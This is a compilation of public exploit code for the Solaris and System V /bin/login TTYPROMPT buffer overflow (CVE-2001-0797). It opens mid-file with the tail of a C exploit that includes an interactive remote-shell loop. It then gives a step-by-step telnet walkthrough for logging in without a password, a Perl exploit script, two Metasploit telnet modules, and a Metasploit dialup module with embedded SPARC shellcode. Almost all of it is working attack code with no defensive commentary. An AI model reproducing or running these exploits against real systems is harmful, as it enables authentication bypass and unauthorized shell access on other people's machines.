read(fd, buf, size); return n; } /* * net_resolve(): simple network resolver */ int net_resolve(char *host) { struct in_addr addr; struct hostent *he; memset(&addr, 0, sizeof(addr)); if ((addr.s_addr = inet_addr(host)) == -1) { if (!(he = (struct hostent *)gethostbyname(host))) return(0); memcpy((char *)&addr.s_addr, he->h_addr, he->h_length); } return(addr.s_addr); } /* * sc_copy(): copy the shellcode, using exploit_addchar() */ int sc_copy(unsigned char *buf, char *str, long len) { unsigned char *or = buf; int i; for(i = 0; i < len; i++) buf += exploit_addchar(buf, str[i]); return(buf - or); } /* * set_val(): copy a dword inside a buffer */ void set_val(char *buf, int pos, int val) { buf[pos] = (val & 0xff000000) >> 24; buf[pos + 1] = (val & 0x00ff0000) >> 16; buf[pos + 2] = (val & 0x0000ff00) >> 8; buf[pos + 3] = (val & 0x000000ff); } /* * shell(): semi-interactive shell hack */ void shell(int fd) { fd_set fds; char tmp[128]; int n; /* quote Hvar 2004 */ fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n"); /* execute auto commands */ write(1, "# ", 2); write(fd, CMD, strlen(CMD)); /* semi-interactive shell */ for (;;) { FD_ZERO(&fds); FD_SET(fd, &fds); FD_SET(0, &fds); if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) { perror("select"); break; } /* read from fd and write to stdout */ if (FD_ISSET(fd, &fds)) { if ((n = read(fd, tmp, sizeof(tmp))) < 0) { fprintf(stderr, "Goodbye...\n"); break; } if (write(1, tmp, n) < 0) { perror("write"); break; } } /* read from stdin and write to fd */ if (FD_ISSET(0, &fds)) { if ((n = read(0, tmp, sizeof(tmp))) < 0) { perror("read"); break; } if (write(fd, tmp, n) < 0) { perror("write"); break; } } } close(fd); exit(1); } void usage(char *progname) { fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname); fprintf(stderr, "-h host\t\tdestination ip or fqdn\n"); fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT); fprintf(stderr, "-d\t\tturn on debug mode\n\n"); exit(1); } // milw0rm.com [2004-12-24]

Solaris TTYPROMPT Security Vulnerability (Telnet) This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker. The vulnerability only requires the attacker to simply define the environment variable TTYPROMPT to a 6-character string, inside telnet. Jonathan believes this overflows an integer inside login, which specifies whether the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet> environ define TTYPROMPT abcdef telnet> o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin # milw0rm.com [2002-11-02]

source: https://www.securityfocus.com/bid/3681/info The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH. Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'. Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges. #!/usr/bin/perl # # Date: 09/01/2003 # Author: snooq [http://www.angelfire.com/linux/snooq/] # # I coded this script to demo how to login to a Solaris box without # password as 'bin'. Nothing new, it's an old bug which dates back # to Dec 2001. # # And, there are already several versions of exploits circulating # in the wild for at least a year now. # # Due to uninformed/incompetent/ignorant sysadmins, there are still # quite a number of vulnerable machines out there. # # 'root' remote login is not allowed by defaut. So, unless, it's # a misconfigured box, you can only go as high as 'bin'. However, # once you are dropped into a shell, further priviledge escalation is # very possible. # # Background info # =============== # From http://www.mail-archive.com/[email protected]/msg09281.html # # [quote] # The problem is there exists an authentication flag called the "fflag" # just after the array that gets overflowed in the .bss segment. This is # an array of char pointers so when it is overflowed because of an # mismanagement on the indexing of this array the fflag gets overwritten # with an valid address on .bss segment. this is good enough to satify # the if(fflag) condition and spawn a shell. # [/quote] # # For more info about this bug, go to: # http://www.cert.org/advisories/CA-2001-34.html # # Disclaimer # ========== # This is meant for you to do a quick check own your systems only. # The author shall not be held responsible for any illegal use # of this code. # # -> some asked 'why code another one?' # I'm bored.. I guess.... been using other ppl's tools... it's time # to write my own.. so that I have a reason to feel proud too... # # -> again, some asked 'why not in C?' # ok... I'm lame.. my C sucks... my Perl sucks too... # I'm not a professional programmer anyway... =p # # As usual, any comments or flames, go to jinyean at hotmail.com # use Socket; use FileHandle; if ($ARGV[0] eq '') { print "Usage: $0 <host>\n"; exit; } $payload="\xff\xfc\x18" # Won't terminal type ."\xff\xfc\x1f" # Won't negotiate window size ."\xff\xfc\x21" # Won't remote flow control ."\xff\xfc\x23" # Won't X display location ."\xff\xfb\x22" # Will linemode ."\xff\xfc\x24" # Won't environment option ."\xff\xfb\x27" # Will new environment option ."\xff\xfb\x00" # Will binary transmission ."\xff\xfa\x27\x00" # My new environ option ."\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54" # 'TTYPROMPT' ."\x01\x61\x62\x63\x64\x65\x66" # 'abcdef', any 6 chars will do ."\xff\xf0"; # Suboption end $port=23; $user="bin"; # You may change this to another user $addr=getaddr($ARGV[0]); for ($i;$i<65;$i++) { $user.=" c"; # Again, any char will do } socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]); connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n"; print "/bin/login array mismanagment exploit by snooq (jinyean\@hotmail.com)\n"; print "Connected. Wait for a shell....\n"; SOCKET->autoflush(); $pid=fork; if ($pid) { # Parent reads send(SOCKET, $payload, 0); send(SOCKET, "$user\n", 0); read(SOCKET,$buff,69); # Read the garbage while (<SOCKET>) {; print STDOUT $_; } } else { # Child sends print SOCKET while (<STDIN>); close SOCKET; } exit; sub getaddr { my $host=($_[0]); my $n=$host; $n=~tr/\.//d; if ($n=~m/\d+/) { return pack('C4',split('\.',$host)); } else { return (gethostbyname($host))[4]; } }

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow', 'Description' => %q{ This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon. }, 'Author' => [ 'MC', 'cazz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0797'], [ 'OSVDB', '690'], [ 'BID', '5531'], ], 'Privileged' => false, 'Platform' => ['unix', 'solaris'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2000, 'BadChars' => '', 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } }, 'Targets' => [ ['Automatic', { }], ], 'DisclosureDate' => 'Jan 18 2002', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(23), OptString.new('USER', [ true, "The username to use", "bin" ]), ], self.class) end def exploit connect banner = sock.get_once print_status('Setting TTYPROMPT...') req = "\xff\xfc\x18" + "\xff\xfc\x1f" + "\xff\xfc\x21" + "\xff\xfc\x23" + "\xff\xfb\x22" + "\xff\xfc\x24" + "\xff\xfb\x27" + "\xff\xfb\x00" + "\xff\xfa\x27\x00" + "\x00TTYPROMPT" + "\x01" + rand_text_alphanumeric(6) + "\xff\xf0" sock.put(req) sleep(0.25) print_status('Sending username...') filler = rand_text_alpha(rand(10) + 1) req << datastore['USER'] + (" #{filler}" * 65) sock.put(req + "\n\n\n") sleep(0.25) sock.get_once sock.put(payload.encoded + "\n") sleep(0.25) handler end end

## # $Id: ttyprompt.rb 9583 2010-06-22 19:11:05Z todb $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow', 'Description' => %q{ This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon. }, 'Author' => [ 'MC', 'cazz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9583 $', 'References' => [ [ 'CVE', '2001-0797'], [ 'OSVDB', '690'], [ 'BID', '5531'], ], 'Privileged' => false, 'Platform' => ['unix', 'solaris'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2000, 'BadChars' => '', 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } }, 'Targets' => [ ['Automatic', { }], ], 'DisclosureDate' => 'Jan 18 2002', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(23), OptString.new('USER', [ true, "The username to use", "bin" ]), ], self.class) end def exploit connect banner = sock.get_once print_status('Setting TTYPROMPT...') req = "\xff\xfc\x18" + "\xff\xfc\x1f" + "\xff\xfc\x21" + "\xff\xfc\x23" + "\xff\xfb\x22" + "\xff\xfc\x24" + "\xff\xfb\x27" + "\xff\xfb\x00" + "\xff\xfa\x27\x00" + "\x00TTYPROMPT" + "\x01" + rand_text_alphanumeric(6) + "\xff\xf0" sock.put(req) select(nil,nil,nil,0.25) print_status('Sending username...') filler = rand_text_alpha(rand(10) + 1) req << datastore['USER'] + (" #{filler}" * 65) sock.put(req + "\n\n\n") select(nil,nil,nil,0.25) sock.get_once sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n") select(nil,nil,nil,0.25) handler end end

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Dialup def initialize(info = {}) super(update_info(info, 'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow', 'Description' => %q{ This exploit connects to a system's modem over dialup and exploits a buffer overlflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. }, 'References' => [ [ 'CVE', '2001-0797'], [ 'OSVDB', '690'], [ 'OSVDB', '691'], [ 'BID', '3681'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'], ], 'Version' => '$Revision: 6479 $', 'Author' => [ 'I)ruid', ], 'Arch' => ARCH_TTY, 'Platform' => ['unix'], 'License' => MSF_LICENSE, 'Payload' => { 'Space' => 3000, 'BadChars' => '', 'DisableNops' => true, }, 'Targets' => [ ['Solaris 2.6 - 8 (SPARC)', { 'Platform' => 'unix', 'Ret' => 0x00027184, # Solaris/SPARC special shellcode (courtesy of inode) # execve() + exit() 'Shellcode' => "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" + "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" + "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" + "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08", 'NOP' => "\x90\x1b\x80\x0e", } ], ], 'DefaultTarget' => 0 )) register_options( [ # OptString.new('USER', [true, 'User to log in as', 'bin']), ], self.class ) deregister_options( ) end def buildbuf print_status("Targeting: #{self.target.name}") retaddr = self.target.ret shellcode = self.target['Shellcode'] nop = self.target['NOP'] user = datastore['USER'] command = datastore['COMMAND'] + "\n" # prepare the evil buffer i = 0 buf = '' # login name buf[i,4] = 'bin ' i += 4 # return address buf[i,4] = [retaddr].pack('N') i += 4 buf[i,1] = ' ' i += 1 # trigger the overflow (0...60).each {|c| buf[i,2] = 'a ' i += 2 } # padding buf[i,4] = ' BBB' i += 4 # nop sled and shellcode (0...398).each {|c| buf[i,nop.size] = nop i += nop.size } shellcode.each_byte {|b| c = b.chr case 'c' when "\\" buf[i,2] = "\\\\" i += 2 when "\xff", "\n", " ", "\t" buf[i,1] = "\\" buf[i+1,1] = (((b & 0300) >> 6) + '0').chr buf[i+2,1] = (((b & 0070) >> 3) + '0').chr buf[i+3,1] = ( (b & 0007) + '0').chr i += 4 else buf[i,1] = c i += 1 end } # TODO: need to overwrite/skip the last byte of shellcode? #i -= 1 # padding buf[i,4] = 'BBB ' i += 4 # pam_handle_t: minimal header buf[i,16] = 'CCCCCCCCCCCCCCCC' i += 16 buf[i,4] = [retaddr].pack('N') i += 4 buf[i,4] = [0x01].pack('N') i += 4 # pam_handle_t: NULL padding (0...52).each {|c| buf[i,4] = [0].pack('N') i += 4 } # pam_handle_t: pameptr must be the 65th ptr buf[i,9] = "\x00\x00\x00 AAAA\n" i += 9 return buf end def exploit buf = buildbuf print_status("Dialing Target") if not connect_dialup print_error("Exiting.") return end print_status("Waiting for login prompt") res = dialup_expect(/ogin:\s/i, 10) #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Login prompt not found... Exiting.") disconnect_dialup return end # send the evil buffer, 256 chars at a time print_status("Sending evil buffer...") #puts Rex::Text.to_hex_dump(buf) len = buf.length p = 0 while(len > 0) do i = len > 0x100 ? 0x100 : len #puts Rex::Text.to_hex_dump(buf[p,i]) dialup_puts(buf[p,i]) len -= i p += i # if len > 0 # puts Rex::Text.to_hex_dump("\x04") # dialup_puts("\x04") if len > 0 # end sleep 0.5 end # wait for password prompt print_status("Waiting for password prompt") res = dialup_expect(/assword:/i, 30) #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Target is likely not vulnerable... Exiting.") disconnect_dialup return end print_status("Password prompt received, waiting for shell") dialup_puts("pass\n") res = dialup_expect(/#\s/i, 20) #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Shell not found.") print_error("Target is likely not vulnerable... Exiting.") disconnect_dialup return end print_status("Success!!!") handler disconnect_dialup end end